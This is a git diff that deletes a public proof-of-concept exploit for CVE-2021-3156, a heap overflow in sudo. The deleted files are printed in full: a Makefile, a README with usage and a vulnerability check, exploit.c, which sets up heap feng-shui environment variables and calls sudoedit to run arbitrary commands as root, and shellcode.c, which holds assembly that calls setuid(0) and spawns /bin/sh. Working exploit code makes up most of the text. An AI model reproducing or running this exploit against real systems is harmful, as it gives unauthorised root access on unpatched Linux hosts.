diff --git a/CVE-2021-3156/Makefile b/CVE-2021-3156/Makefile deleted file mode 100644 index c1b1fa05272e10b939fe1eefb86f0682328bd7b0..0000000000000000000000000000000000000000 --- a/CVE-2021-3156/Makefile +++ /dev/null @@ -1,11 +0,0 @@ -all: shellcode exploit - -shellcode: shellcode.c - mkdir libnss_x - $(CC) -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c - -exploit: exploit.c - $(CC) -O3 -w -o exploit exploit.c - -clean: - rm -rf libnss_x exploit diff --git a/CVE-2021-3156/README.md b/CVE-2021-3156/README.md deleted file mode 100644 index fcd7ce961a8e89e2ba0636ae08648c9ce8f15d8d..0000000000000000000000000000000000000000 --- a/CVE-2021-3156/README.md +++ /dev/null @@ -1,30 +0,0 @@ -# CVE-2021-3156 - -![2021-02-10-02-18-07](images/450acf1a2f14793aafa987905b20eeba.png) - -> This is a warehouse modification based on [@CptGibbon](https://github.com/CptGibbon/CVE-2021-3156 ) and supports arbitrary command execution. - -相关阅读:[CVE-2021-3156 - Exploit修改](https://payloads.online/archivers/2021-02-09/1) - -#### Root shell PoC for CVE-2021-3156 (no bruteforce) - -For educational purposes etc. - -Tested on : - -- @CptGibbon Ubuntu 20.04 against sudo 1.8.31 -- @Rvn0xsy Ubuntu 17.10 - -All research credit: **Qualys Research Team** -Check out the details on their [blog](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit). - -You can check your version of sudo is vulnerable with: `$ sudoedit -s Y`. -If it asks for your password it's most likely vulnerable, if it prints usage information it isn't. -You can downgrade to the vulnerable version on Ubuntu 20.04 for testing purposes with `$ sudo apt install sudo=1.8.31-1ubuntu1` - -#### Usage - -`$ make` - -`$ ./exploit "Command"` - diff --git a/CVE-2021-3156/exploit.c b/CVE-2021-3156/exploit.c deleted file mode 100644 index 354632e0cab944cec8738366a63e1fd3ba725a1f..0000000000000000000000000000000000000000 --- a/CVE-2021-3156/exploit.c +++ /dev/null @@ -1,108 +0,0 @@ -#include // execve() -#include // strcat() -#include - -/* Exploit for CVE-2021-3156, drops a root shell. - * All credit for original research: Qualys Research Team. - * https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - * - * Tested on Ubuntu 20.04 against sudo 1.8.31 - * Author: Max Kamper - */ - - - -int main(int argc, char * argv[]) { - - if(argc < 2){ - printf("Usage: %s \n",argv[0]); - printf("[+]Refrence : @Qualys Research Team @Max Kamper \n"); - printf("[+]Modify by Rvn0xsy@ https://payloads.online\n"); - return 0; - } - char * input_command = argv[1]; - int nSize = strlen(input_command)+6; - - char * command = malloc(nSize); - memset(command,0x00,nSize); - sprintf(command,"test\n\n%s\n",input_command); - // 'buf' size determines size of overflowing chunk. - // This will allocate an 0xf0-sized chunk before the target service_user struct. - int i; - char buf[0xf0] = {0}; - memset(buf, 'Y', 0xe0); - strcat(buf, "\\"); - - char* sudoedit_argv[] = { - "sudoedit", - "-S", - "-s", - buf, - NULL}; - - // Use some LC_ vars for heap Feng-Shui. - // This should allocate the target service_user struct in the path of the overflow. - char messages[0xe0] = {"LC_MESSAGES=en_GB.UTF-8@"}; - memset(messages + strlen(messages), 'A', 0xb8); - - char telephone[0x50] = {"LC_TELEPHONE=C.UTF-8@"}; - memset(telephone + strlen(telephone), 'A', 0x28); - - char measurement[0x50] = {"LC_MEASUREMENT=C.UTF-8@"}; - memset(measurement + strlen(measurement), 'A', 0x28); - - // This environment variable will be copied onto the heap after the overflowing chunk. - // Use it to bridge the gap between the overflow and the target service_user struct. - char overflow[0x500] = {0}; - memset(overflow, 'X', 0x4cf); - strcat(overflow, "\\"); - - // Overwrite the 'files' service_user struct's name with the path of our shellcode library. - // The backslashes write nulls which are needed to dodge a couple of crashes. - char* envp[] = { - overflow, - "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", - "XXXXXXX\\", - "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", - "\\", "\\", "\\", "\\", "\\", "\\", "\\", - "x/x\\", - "Z", - messages, - telephone, - measurement, - NULL}; - - // Invoke sudoedit with our argv & envp. - - int des_p[2]; - if(pipe(des_p) == -1){ - - puts("Error .. pipe \n"); - return -1; - } - - if(fork() == 0) //first fork - { - close(STDOUT_FILENO); //closing stdout - dup(des_p[1]); //replacing stdout with pipe write - close(des_p[0]); //closing pipe read - write(des_p[1],command, strlen(command)); - close(des_p[1]); - exit(1); - } - - if(fork()==0){ - close(STDIN_FILENO); //closing stdin - dup(des_p[0]); //replacing stdin with pipe read - close(des_p[1]); //closing pipe write - close(des_p[0]); - - execve("/usr/bin/sudoedit", sudoedit_argv, envp); - perror("execvp of stdread failed"); - exit(1); - } - close(des_p[0]); - close(des_p[1]); - wait(0); - wait(0); -} diff --git a/CVE-2021-3156/images/450acf1a2f14793aafa987905b20eeba.png b/CVE-2021-3156/images/450acf1a2f14793aafa987905b20eeba.png deleted file mode 100644 index 3bfa8aa6c8fca049ec5ca5e3d29dc6fb70074c5d..0000000000000000000000000000000000000000 Binary files a/CVE-2021-3156/images/450acf1a2f14793aafa987905b20eeba.png and /dev/null differ diff --git a/CVE-2021-3156/shellcode.c b/CVE-2021-3156/shellcode.c deleted file mode 100644 index 367a918f2b5461d33eb497476c90eb59ed4d3376..0000000000000000000000000000000000000000 --- a/CVE-2021-3156/shellcode.c +++ /dev/null @@ -1,34 +0,0 @@ -static void __attribute__((constructor)) _init(void) { - __asm __volatile__( - "addq $64, %rsp;" - // setuid(0); - "movq $105, %rax;" - "movq $0, %rdi;" - "syscall;" - - - // setgid(0); - "movq $106, %rax;" - "movq $0, %rdi;" - "syscall;" - - - // execve("/bin/sh"); - "movq $59, %rax;" - "movq $0x0068732f6e69622f, %rdi;" - "pushq %rdi;" - "movq %rsp, %rdi;" - "movq $0, %rdx;" - "pushq %rdx;" - "pushq %rdi;" - "movq %rsp, %rsi;" - "syscall;" - - - // exit(0); - "movq $60, %rax;" - "movq $0, %rdi;" - "syscall;" - -); -}